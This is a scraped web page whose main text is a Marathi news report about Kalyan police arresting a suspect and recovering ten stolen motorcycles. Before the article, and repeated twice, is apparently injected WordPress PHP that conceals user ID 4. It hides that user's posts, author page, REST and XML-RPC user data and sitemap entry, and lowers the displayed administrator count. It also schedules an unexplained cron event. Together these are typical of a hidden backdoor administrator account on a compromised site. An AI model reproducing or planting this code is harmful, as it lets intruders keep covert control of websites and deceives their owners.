add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
लाखोंच्या दुचाकी चोरीचा भंडाफोड; आरोपी पोलिसांच्या जाळ्यात - crimeaala.com
कल्याण : वाहन चोरीच्या वाढत्या घटनांना आळा घालण्यासाठी कोळसेवाडी पोलिसांनी मोठी कारवाई करत सराईत आरोपीला अटक केली असून तब्बल ३ लाख ५५ हजार रुपये किमतीच्या १० मोटारसायकली जप्त केल्या आहेत.
पोलीस ठाणे हद्दीत वाढत्या वाहन चोरीच्या गुन्ह्यांच्या पार्श्वभूमीवर मा. पोलीस उप आयुक्त परि. ०३ कल्याण अतुल झेंडे, सहा पोलीस आयुक्त कल्याण विभाग कल्याणजी घेटे, वरिष्ठ पोलीस निरीक्षक हेमंत गुरव, तसेच पोलीस निरीक्षक (गुन्हे) गणेश न्हायदे यांच्या मार्गदर्शनाखाली विशेष पथकाची स्थापना करण्यात आली होती.
दिनांक ०३ एप्रिल २०२६ रोजी पोशि/१५२६ सुरेंद्र इंगळे यांना बातमीदारामार्फत माहिती मिळाली की, विठ्ठलवाडी रेल्वे स्टेशन समोर रॉयल रेसिडेन्सी परिसरात दोन इसम संशयास्पद हालचाली करत असून उभ्या असलेल्या वाहनांची पाहणी करत आहेत. या माहितीच्या आधारे पोलिसांनी तात्काळ सापळा रचून शुभम उर्फ शिवम संपत पठारे (वय २४, रा. उल्हासनगर ०३) व एक विधीसंघर्षित बालक यांना ताब्यात घेतले.
तपासादरम्यान आरोपींकडून चोरीस गेलेली एक्सेस १२५ स्कुटी (MH05/EN-5871) जप्त करण्यात आली. पुढील चौकशीत आरोपीकडून एकूण १० मोटारसायकली (किंमत अंदाजे ₹३,५५,०००) जप्त करण्यात आल्या. ही वाहने विठ्ठलवाडी, महात्मा फुले चौक व उल्हासनगर परिसरातून चोरी केल्याचे उघड झाले आहे. या कारवाईमुळे वाहन चोरीचे एकूण ०८ गुन्हे उघडकीस आले आहेत. सदर गुन्ह्याचा पुढील तपास पोहवा/२१५ दत्तू जाधव हे करत आहेत.
या यशस्वी कारवाईत सहभागी अधिकारी व कर्मचारी: सपोनि संदीप भालेराव, पोलीस उपनिरीक्षक जगन सापटे, पोहवा/६२५६ कापडी, पोहवा/१५३२ बोरसे, पोहवा/१२२६ सांगळे, पोहवा/१३१२ सौंदाणे, पोहवा/६५४८ सांगळे, पोहवा/५०३ वाघ, पोहवा/६९३० घुगे, पोहवा/२२८३ आव्हाड, पोहवा/२१५ जाधव, पोहवा/४२० बुधवंत, पोना/५०२५ फटांगरे, पोना/४५७ कोती, पोशि/१५२६ इंगळे, पोशि/३६०१ खरे, पोशि/२६५६ सोनावळे, पोशि/८४१४ गिते यांनी ही कारवाई यशस्वीपणे पार पाडली.